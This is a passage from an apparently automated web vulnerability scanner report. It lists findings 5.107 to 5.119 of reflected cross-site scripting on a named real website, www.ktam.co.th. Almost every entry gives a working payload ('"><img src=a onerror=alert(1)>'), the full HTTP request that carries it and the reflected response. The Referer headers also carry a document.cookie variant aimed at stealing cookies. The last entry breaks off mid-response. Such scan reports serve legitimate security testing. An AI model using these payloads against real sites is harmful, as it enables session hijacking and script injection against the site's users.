Path:   /en/index.php/ims/cmd_search1.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab120"><img%20src%3da%20onerror%3dalert(1)>9dcde303979 was submitted in the REST URL parameter 4. This input was echoed as ab120\"><img src=a onerror=alert(1)>9dcde303979 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/cmd_search1.gifab120"><img%20src%3da%20onerror%3dalert(1)>9dcde303979 HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:27:58 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29528

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/cmd_search1.gifab120\"><img src=a onerror=alert(1)>9dcde303979" title="THAI">
...[SNIP]...

5.107. http://www.ktam.co.th/en/index.php/ims/empty.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/empty.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df065"><img%20src%3da%20onerror%3dalert(1)>1a8c6c1b882 was submitted in the REST URL parameter 4. This input was echoed as df065\"><img src=a onerror=alert(1)>1a8c6c1b882 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/empty.gifdf065"><img%20src%3da%20onerror%3dalert(1)>1a8c6c1b882 HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:27:59 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29522

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/empty.gifdf065\"><img src=a onerror=alert(1)>1a8c6c1b882" title="THAI">
...[SNIP]...

5.108. http://www.ktam.co.th/en/index.php/ims/h_download1.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/h_download1.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4bf25"><img%20src%3da%20onerror%3dalert(1)>61e664de751 was submitted in the REST URL parameter 4. This input was echoed as 4bf25\"><img src=a onerror=alert(1)>61e664de751 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/h_download1.gif4bf25"><img%20src%3da%20onerror%3dalert(1)>61e664de751 HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:28:19 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29528

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/h_download1.gif4bf25\"><img src=a onerror=alert(1)>61e664de751" title="THAI">
...[SNIP]...

5.109. http://www.ktam.co.th/en/index.php/ims/h_link1.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/h_link1.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4d4a"><img%20src%3da%20onerror%3dalert(1)>db91496aa12 was submitted in the REST URL parameter 4. This input was echoed as c4d4a\"><img src=a onerror=alert(1)>db91496aa12 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/h_link1.gifc4d4a"><img%20src%3da%20onerror%3dalert(1)>db91496aa12 HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:28:00 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29524

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/h_link1.gifc4d4a\"><img src=a onerror=alert(1)>db91496aa12" title="THAI">
...[SNIP]...

5.110. http://www.ktam.co.th/en/index.php/ims/i_acrobat.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/i_acrobat.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a57b"><img%20src%3da%20onerror%3dalert(1)>77670ba0cf0 was submitted in the REST URL parameter 4. This input was echoed as 1a57b\"><img src=a onerror=alert(1)>77670ba0cf0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/i_acrobat.gif1a57b"><img%20src%3da%20onerror%3dalert(1)>77670ba0cf0 HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:28:12 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29526

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/i_acrobat.gif1a57b\"><img src=a onerror=alert(1)>77670ba0cf0" title="THAI">
...[SNIP]...

5.111. http://www.ktam.co.th/en/index.php/ims/i_firefox.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/i_firefox.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4b98"><img%20src%3da%20onerror%3dalert(1)>a7a6cb10988 was submitted in the REST URL parameter 4. This input was echoed as b4b98\"><img src=a onerror=alert(1)>a7a6cb10988 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/i_firefox.gifb4b98"><img%20src%3da%20onerror%3dalert(1)>a7a6cb10988 HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:28:11 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29526

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/i_firefox.gifb4b98\"><img src=a onerror=alert(1)>a7a6cb10988" title="THAI">
...[SNIP]...

5.112. http://www.ktam.co.th/en/index.php/ims/i_flash.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/i_flash.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94a4a"><img%20src%3da%20onerror%3dalert(1)>6c583bc2de1 was submitted in the REST URL parameter 4. This input was echoed as 94a4a\"><img src=a onerror=alert(1)>6c583bc2de1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/i_flash.gif94a4a"><img%20src%3da%20onerror%3dalert(1)>6c583bc2de1 HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:28:09 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29524

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/i_flash.gif94a4a\"><img src=a onerror=alert(1)>6c583bc2de1" title="THAI">
...[SNIP]...

5.113. http://www.ktam.co.th/en/index.php/ims/i_winmedia.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/i_winmedia.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a517c"><img%20src%3da%20onerror%3dalert(1)>d04b46e3f13 was submitted in the REST URL parameter 4. This input was echoed as a517c\"><img src=a onerror=alert(1)>d04b46e3f13 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/i_winmedia.gifa517c"><img%20src%3da%20onerror%3dalert(1)>d04b46e3f13 HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:28:14 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29527

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/i_winmedia.gifa517c\"><img src=a onerror=alert(1)>d04b46e3f13" title="THAI">
...[SNIP]...

5.114. http://www.ktam.co.th/en/index.php/ims/mails.png [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/mails.png

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 880fe"><img%20src%3da%20onerror%3dalert(1)>2e1ef035bf was submitted in the REST URL parameter 4. This input was echoed as 880fe\"><img src=a onerror=alert(1)>2e1ef035bf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/mails.png880fe"><img%20src%3da%20onerror%3dalert(1)>2e1ef035bf HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:27:54 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29521

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/mails.png880fe\"><img src=a onerror=alert(1)>2e1ef035bf" title="THAI">
...[SNIP]...

5.115. http://www.ktam.co.th/en/index.php/ims/news.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/news.php

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26408"><img%20src%3da%20onerror%3dalert(1)>6c8f14845c9 was submitted in the REST URL parameter 4. This input was echoed as 26408\"><img src=a onerror=alert(1)>6c8f14845c9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/news.php26408"><img%20src%3da%20onerror%3dalert(1)>6c8f14845c9 HTTP/1.1
Host: www.ktam.co.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3b7ee77d888366dba59cfd0298d0cdc0;

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:46:26 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29519

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/news.php26408\"><img src=a onerror=alert(1)>6c8f14845c9" title="THAI">
...[SNIP]...

5.116. http://www.ktam.co.th/en/index.php/ims/news.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/news.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89124"><img%20src%3da%20onerror%3dalert(1)>9b35450f06c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 89124\"><img src=a onerror=alert(1)>9b35450f06c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/news.php/89124"><img%20src%3da%20onerror%3dalert(1)>9b35450f06c HTTP/1.1
Host: www.ktam.co.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3b7ee77d888366dba59cfd0298d0cdc0;

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:40:54 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29511

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/89124\"><img src=a onerror=alert(1)>9b35450f06c" title="THAI">
...[SNIP]...

5.117. http://www.ktam.co.th/en/index.php/ims/p_flag_th.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/p_flag_th.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6186"><img%20src%3da%20onerror%3dalert(1)>ca64bcab867 was submitted in the REST URL parameter 4. This input was echoed as f6186\"><img src=a onerror=alert(1)>ca64bcab867 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/p_flag_th.giff6186"><img%20src%3da%20onerror%3dalert(1)>ca64bcab867 HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:27:56 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29526

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/p_flag_th.giff6186\"><img src=a onerror=alert(1)>ca64bcab867" title="THAI">
...[SNIP]...

5.118. http://www.ktam.co.th/en/index.php/ims/p_ktamnew.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/p_ktamnew.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29cc6"><img%20src%3da%20onerror%3dalert(1)>3381147be69 was submitted in the REST URL parameter 4. This input was echoed as 29cc6\"><img src=a onerror=alert(1)>3381147be69 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/p_ktamnew.gif29cc6"><img%20src%3da%20onerror%3dalert(1)>3381147be69 HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:28:04 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29526

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/p_ktamnew.gif29cc6\"><img src=a onerror=alert(1)>3381147be69" title="THAI">
...[SNIP]...

5.119. http://www.ktam.co.th/en/index.php/ims/p_ktamonline.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/p_ktamonline.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b64d"><img%20src%3da%20onerror%3dalert(1)>b6ce0f48117 was submitted in the REST URL parameter 4. This input was echoed as 4b64d\"><img src=a onerror=alert(1)>b6ce0f48117 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/p_ktamonline.gif4b64d"><img%20src%3da%20onerror%3dalert(1)>b6ce0f48117 HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:28:07 GMT
